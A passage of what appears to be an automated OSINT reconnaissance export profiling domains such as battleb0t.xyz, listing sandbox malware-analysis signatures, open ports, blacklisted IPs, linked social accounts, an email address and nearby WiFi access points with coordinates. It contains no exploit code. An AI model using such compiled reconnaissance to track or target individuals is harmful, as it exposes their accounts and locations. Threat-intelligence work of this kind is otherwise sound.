1, u'type': 2, u'description': u'Pattern match: "fernando.r@alliedglobal.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/60 Antivirus vendors marked sample as malicious (16% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-7', u'name': u'Uses network protocols on unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 7, u'threat_level': 2, u'type': 7, u'description': u'TCP traffic to 104.22.58.100 on port 49728\n TCP traffic to 185.199.109.153 on port 49730\n TCP traffic to 13.35.125.109 on port 49731\n TCP traffic to 149.154.167.220 on port 49732\n TCP traffic to 51.11.192.48 on port 49736'}], u'threat_level': 2, u'size': 102455, u'job_id': u'63e596ab38f3a44d604cd090', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:8080 | 188.114.96.1 |
| 2023-05-12 02:46:16 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub, Inc. is an Internet hosting service for software development and version control using Git. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project. Headquartered in California, it has been a subsidiary of Microsoft since 2018. It is commonly used to host open source software development projects. As of January 2023, GitHub reported having over 100 million developers and more than 372 million repositories, including at least 28 million public repositories. It is the largest source code host as of November 2021. | battleb0t.github.io |
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.98 | 87.248.157.102 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | fluid.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://fluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://fluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] |
| 2023-05-12 03:38:38 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.167) | 207.154.228.167 |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (172.67.135.9): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 172.67.135.9 |
| 2023-05-12 02:56:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.opinionsbildarna.se/manifest.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar15A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "184.31.135.120:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_948_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_948_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_948_IESQMMUTEX_0_519"\n "IsoScope_948_IE_EarlyTabStart_0x96c_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_948_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2376"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_948_ConnHashTable<2376>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab159.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003848]\n "WFXJLKMZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WFXJLKMZ.txt]- [targetUID: 00000000-00002376]\n "manifest_1_.webmanifest" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFFAAD4CD900CEC332.TMP" has type "data"- Location: [%TEMP%\\~DFFAAD4CD900CEC332.TMP]- [targetUID: 00000000-00002376]\n "~DF3FFEC317C0D185F4.TMP" has type "data"- Location: [%TEMP%\\~DF3FFEC317C0D185F4.TMP]- [targetUID: 00000000-00002376]\n "_C4F83231-322A-11ED-9777-0800272EAECA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002376]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003848]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002376]\n "AA3B58698007BC824A9E81451B820AFD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\AA3B58698007BC824A9E81451B820AFD]- [targetUID: 00000000-00003848]\n "_48B0BBD4-322D-11ED-9777-0800272EAECA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "QWM3ZIWJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QWM3ZIWJ.txt]- [targetUID: 00000000-00003848]\n "~DF34206CEDA4E061F8.TMP" has type "data"- Location: [%TEMP%\\~DF34206CEDA4E061F8.TMP]- [targetUID: 00000000-00002376]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002376]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.opinionsbildarna.se/manifest.webmanifest"\n Pattern match: "https://www.opinionsbildarna.se"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Pattern match: "www.opinionsbildarna.se"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.opinionsbildarna.se\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 989\nContent-Type: application/octet-stream\nDate: Mon, 12 Sep 2022 01:26:03 GMT\nEtag: "9af86af75fb7ff64f2c69342f94824f7-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GCQMVBVYJY64KT58P2H0V8CG\n\n{"name":"opinionsbildarna","short_name":"opinionsbildarna","start_url":"/","background_color":"#663399","theme_color":"#663399","display":"minimal-ui","icons":[{"src":"icons/icon-48x48.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"48x48","type":"image/png"},{"src":"icons/icon-72x72.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"72x72","type":"image/png"},{"src":"icons/icon-96x96.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"96x96","type":"image/png"},{"src":"icons/icon-144x144.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"144x144","type":"image/png"},{"src":"icons/icon-192x192.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"192x192","type":"image/png"},{"src":"icons/icon-256x256.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"256x256","type":"image/png"},{"src":"icons/icon-384x384.png?v=7434068eaf17e8601"- [Source: SSL_104.196.30.220]\n, "e02a866de2e7a8e","sizes":"384x384","type":"image/png"},{"src":"icons/icon-512x512.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"512x512","type":"image/png"}]}"- [Source: SSL_104.196.30.220]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.opinionsbildarna.se\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 404 Not Found\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Type: text/html; charset=utf-8\nDate: Mon, 12 Sep 2022 01:26:05 GMT\nEtag: 1565395025-ssl-df\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GCQMVDN4B9431AR7ABBHYQ23\nTransfer-Encoding: chunked"- [Source: SSL_104.196.30.220]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artif | 104.196.30.220 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.battleb0t.xyz | [{"url": "https://www.battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://www.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ten Forward 5 (Net ID: 00:01:9F:34:7C:14) | 34.0544, -118.244 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Curiouscat (Category: social)
https://curiouscat.live/Altpapier | Altpapier |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | themeforest (Category: art)
https://themeforest.net/user/login | login |
| 2023-05-12 02:54:13 | Linked URL - External | No | Web Spider | 1 | 0 | 2 | 0 | None | https://github.com/BattleB0t | https://battleb0t.xyz/ |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) | 37.780462,-122.390564 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=Battleb0t | Battleb0t |
| 2023-05-12 02:54:21 | Web Content | No | Web Spider | 0 | 0 | 5 | 0 | None | .container{width:100%}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-center{background-position:50%}.bg-no-repeat{background-repeat:no-repeat}.border-gray-300{--border-opacity:1;border-color:#ebebeb;border-color:rgba(235,235,235,var(--border-opacity))}.rounded{border-radius:.25rem}.border-solid{border-style:solid}.border-0{border-width:0}.border{border-width:1px}.border-t{border-top-width:1px}.cursor-pointer{cursor:pointer}.block{display:block}.inline-block{display:inline-block}.table{display:table}.hidden{display:none}.float-left{float:left}.clearfix:after{content:"";display:table;clear:both}.font-mono{font-family:monaco,courier,monospace}.font-light{font-weight:300}.font-normal{font-weight:400}.font-semibold{font-weight:600}.h-12{height:3rem}.h-20{height:5rem}.text-13{font-size:13px}.text-15{font-size:15px}.text-60{font-size:60px}.text-2xl{font-size:1.5rem}.text-3xl{font-size:1.875rem}.leading-tight{line-height:1.25}.leading-normal{line-height:1.5}.leading-relaxed{line-height:1.625}.leading-1\.3{line-height:1.3}.my-8{margin-top:2rem;margin-bottom:2rem}.mx-auto{margin-left:auto;margin-right:auto}.mr-2{margin-right:.5rem}.mb-2{margin-bottom:.5rem}.mt-3{margin-top:.75rem}.mb-4{margin-bottom:1rem}.ml-4{margin-left:1rem}.mt-6{margin-top:1.5rem}.mb-6{margin-bottom:1.5rem}.mb-8{margin-bottom:2rem}.mb-10{margin-bottom:2.5rem}.ml-10{margin-left:2.5rem}.mb-15{margin-bottom:3.75rem}.-ml-6{margin-left:-1.5rem}.overflow-hidden{overflow:hidden}.p-0{padding:0}.py-2{padding-top:.5rem;padding-bottom:.5rem}.px-4{padding-left:1rem;padding-right:1rem}.py-8{padding-top:2rem;padding-bottom:2rem}.py-10{padding-top:2.5rem;padding-bottom:2.5rem}.py-15{padding-top:3.75rem;padding-bottom:3.75rem}.pr-6{padding-right:1.5rem}.pt-10{padding-top:2.5rem}.absolute{position:absolute}.relative{position:relative}.left-1\/2{left:50%}.-bottom-4{bottom:-1rem}.resize{resize:both}.text-center{text-align:center}.text-black-dark{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#999;color:rgba(153,153,153,var(--text-opacity))}.text-red-error{--text-opacity:1;color:#bd2426;color:rgba(189,36,38,var(--text-opacity))}.text-green-success{--text-opacity:1;color:#9bca3e;color:rgba(155,202,62,var(--text-opacity))}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.w-12{width:3rem}.w-240{width:60rem}.w-1\/2{width:50%}.w-1\/3{width:33.333333%}.w-full{width:100%}.transition{-webkit-transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,-webkit-transform}body,html{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity));-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-size:16px}*,body,html{margin:0;padding:0}*{box-sizing:border-box}a{--text-opacity:1;color:#2f7bbf;color:rgba(47,123,191,var(--text-opacity));text-decoration:none;-webkit-transition-property:all;transition-property:all;-webkit-transition-duration:.15s;transition-duration:.15s;-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);transition-timing-function:cubic-bezier(0,0,.2,1)}a:hover{--text-opacity:1;color:#f68b1f;color:rgba(246,139,31,var(--text-opacity))}img{display:block;width:100%;height:auto}#what-happened-section p{font-size:15px;line-height:1.5}strong{font-weight:600}.bg-gradient-gray{background-image:-webkit-linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}.cf-error-source:after{position:absolute;--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity));width:2.5rem;height:2.5rem;--transform-translate-x:0;--transform-translate-y:0;--transform-rotate:0;--transform-skew-x:0;--transform-skew-y:0;--transform-scale-x:1;--transform-scale-y:1;-webkit-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));-ms-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));--transform-rotate:45deg;content:"";bottom:-1.75rem;left:50%;margin-left:-1.25rem;box-shadow:0 0 4px 4px #dedede}@media screen and (max-width:720px){.cf-error-source:after{display:none}}.cf-icon-browser{background-image:url(/cdn-cgi/images/cf-icon-browser.png)}.cf-icon-cloud{background-image:url(/cdn-cgi/images/cf-icon-cloud.png)}.cf-icon-server{background-image:url(/cdn-cgi/images/cf-icon-server.png)}.cf-icon-ok{background-image:url(/cdn-cgi/images/cf-icon-ok.png)}.cf-icon-error{background-image:url(/cdn-cgi/images/cf-icon-error.png)}#cf-wrapper .feedback-hidden{display:none}#cf-wrapper .feedback-success{min-height:33px;line-height:33px}#cf-wrapper .cf-button{color:#0051c3;font-size:13px;border-color:#0045a6;-webkit-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.2s;transition-duration:.2s;-webkit-transition-property:background-color,border-color,color;transition-property:background-color,border-color,color}#cf-wrapper .cf-button:hover{color:#fff;background-color:#003681}.cf-error-footer .hidden{display:none}.cf-error-footer .cf-footer-ip-reveal-btn{-webkit-appearance:button;-moz-appearance:button;appearance:button;text-decoration:none;background:none;color:inherit;border:none;padding:0;font:inherit;cursor:pointer;color:#0051c3;-webkit-transition:color .15s ease;transition:color .15s ease}.cf-error-footer .cf-footer-ip-reveal-btn:hover{color:#ee730a}.code-label{background-color:#d9d9d9;color:#313131;font-weight:500;border-radius:1.25rem;font-size:.75rem;line-height:4.5rem;padding:.25rem .5rem;height:4.5rem;white-space:nowrap;vertical-align:middle}@media (max-width:639px){.sm\:block{display:block}.sm\:hidden{display:none}.sm\:mb-1{margin-bottom:.25rem}.sm\:mb-2{margin-bottom:.5rem}.sm\:py-4{padding-top:1rem;padding-bottom:1rem}.sm\:px-8{padding-left:2rem;padding-right:2rem}.sm\:text-left{text-align:left}}@media (max-width:720px){.md\:border-gray-400{--border-opacity:1;border-color:#dedede;border-color:rgba(222,222,222,var(--border-opacity))}.md\:border-solid{border-style:solid}.md\:border-0{border-width:0}.md\:border-b{border-bottom-width:1px}.md\:block{display:block}.md\:inline-block{display:inline-block}.md\:hidden{display:none}.md\:float-none{float:none}.md\:text-3xl{font-size:1.875rem}.md\:m-0{margin:0}.md\:mt-0{margin-top:0}.md\:mb-2{margin-bottom:.5rem}.md\:p-0{padding:0}.md\:py-8{padding-top:2rem;padding-bottom:2rem}.md\:px-8{padding-left:2rem;padding-right:2rem}.md\:pr-0{padding-right:0}.md\:pb-10{padding-bottom:2.5rem}.md\:top-0{top:0}.md\:right-0{right:0}.md\:left-auto{left:auto}.md\:text-left{text-align:left}.md\:w-full{width:100%}}@media (max-width:1023px){.lg\:text-sm{font-size:.875rem}.lg\:text-2xl{font-size:1.5rem}.lg\:text-4xl{font-size:2.25rem}.lg\:leading-relaxed{line-height:1.625}.lg\:px-8{padding-left:2rem;padding-right:2rem}.lg\:pt-6{padding-top:1.5rem}.lg\:w-full{width:100%}}
| http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Passport (2.4 GHz) - 07E0F4 (Net ID: 00:00:C0:07:E0:F4) | 52.3759, 4.8975 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Discogs (Category: music)
https://www.discogs.com/user/login | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2D:B3:F8) | 34.0544, -118.244 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | fansly (Category: XXXPORNXXX)
https://fansly.com/ayhu/posts | ayhu |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:80 | 188.114.96.0/24 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | http://ayhu.xyz/ | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="y6.jA_9kQFy3M6YOg.QQj0I7RDwRq_S0_mJGsO_2b80-1683861862-0-AcgqVWkb5rc1wRzq8CruZzqixRf2dFZvnnpeMqPo3y2RR7Jx_-WXovg8bbE5-sP--_UlGfcV7z4_V2dzBcMQgc0YMGe-kEUsKgbTagVXmpUA4ghc-4PKKMUpkHtuZz1pOKMcK0utLj3hccZMUZnWLxuhkTuTIuQG4o4TSyLTO5DkVUoXElS5eAJBZDveAXcM-BMmbtyiS5OZrdIj-mSAmfLaL706pmvV2Fnl5vtOScBdKynAsN6R2sxLPULzhy1STjWMiZSraZ6Ew2wxtjJHN1h4TKQbcQWPXgeC7N8JO4M701hR33k8KGtSEURoh0GVidfXau0xJ5Jr_OGYkw5FwTBNxUlh_dNr8sS8DOR88UaR5CKeXC5a8lA8uHqsSe_vEPdtQ6ldEQsz8iyhLDK-toyNqpISWEaAU-LNzhQYcTSFycIkBAwjz1zpN5j-awjwVXg6RSi8xKpcwkSr--vTKuOd6x5Ta6zVKvVa1ZDb1BUG5hCEGVVAylLih2TiGym6K9ZGtKfmo5uFC383bpOhjywcXyRzMeHVb0-6rTS3z63iX3ajtvlcxXXHBtT7ZYhauWYn6f0gWo9iG78z0gFNWMboZLU8duYgFtCeIooI5W88WdaOwHui00SnK7AZf-I1NO1RlI5CzrcfcBEcVnBP-f_yBVIgGca2GM5pwr7RuguWROnl62QKlF8-RLW3LA5gZmJXKAJZeG1tfcH7m64xxmCx5ACGWrjrUMscOUmz4eHVBUSovlHfs3fcaIk9rIcxhwwBJRVDZ7oKn49L5lwNMgQFGDH_uzu8lK7M31bKNSdUqZK_4nMd7x2dSJvuX6x1f0d5_OcVPHJZxZ3t19Y2v21qYtJUwk_l3orppRJLdYFyIFSiVGRp27InLA-bNsaoFJuYkaXhMvKIRYQcI57Gu9t5UJBJyHfItWPN13CPHmTRR-xesXCsUCGNSlrn27LW82G3vB0LsnqsDVH9D7CmoXk767loN6MRiMM6E9lV7pktIJEgRREZerErCz-Gw9056q07NCPJYQafcy44fhA0Ayu8GVn0zQYz2hW6ho8NtCxWLxQfDeVyMn6PMsg4IcHVBtGEwWH4OhHGTM9Y96fCik0WwBZwbXdS00HiRtlSReGbhDYPFuGYXFHlUkiHUQ8TNNjJwXP8HrnSnr-Tv6HMk8DT21iZM1t8Ws-Z1VPVHIUqMpqoj6bYoJTKdTHCyWVXSoymcDjiiAr_dGcQ70iCvCfjEHAw9_ZFb11mKAVckSFfHs_OhqOxwVZ8fWFWX5CRVYjb8-2Mg4cL3IvIHLOVh97Eo-8uZhAyESkAuV2iGT1_77CGqcRlglDGfKHj9D0j_GrA2lys8V_W4n84xH9sB9BtW8YrWDnEH4r1lV4ZaxbUDArRwxqP9P1FzSMMjtcVzsgzIRpF2ste2ogtL1ku1f750t7TYDkzGvNZnmSp--sTxTZcyZjvZuT-kxIOnFkQudjV92D0dpRia33x6FdgV44_rvGqDtNVBEvpDVRPc5F7iWJTGkpG_0wSt-t0pHAlpnVj5960VNsQ1fIVqzIjyeTRIupoKny56OID3zofBUX9GXMMvftzuBxkvH568kA-nhoghfb5gJUTU4dQVs3R3lvIMsLJW_0OugCzVwa7bbjSi3yNlNTmyyZSUaQHqMOYwEHt04GQZ_JQBpDCQvIGLq1fOLeArqr97ZPrGgk_x7n2c6MIQK0vFFlSI1sI8OS4yi8D0V-GNr2Bt_G2Ue_TKIZGNfQPaWAM0jGlpc1nPWIZS-sYxW-8ui-6eexGBFZ5-zLr2uaHNG_xNol2Di7iRI4TW5JoZOZTUx2wSZVCmafA5viAw12czMeK4Ymm36GiAo0mTnIrrghObXpHRydCjEOD-ie6KdVTajZGWvZP24dk25nzrx7uELmxfIPaAvIALx9AdiYBCbeQ0Yz_UH9uDQF6Eh_AqthmXwQQH1F4IA_32McFzcxir6Txr6Mur3t22mOZF963IcNMqvP7vPcccq_rufb25sF8o6nhmaVg8c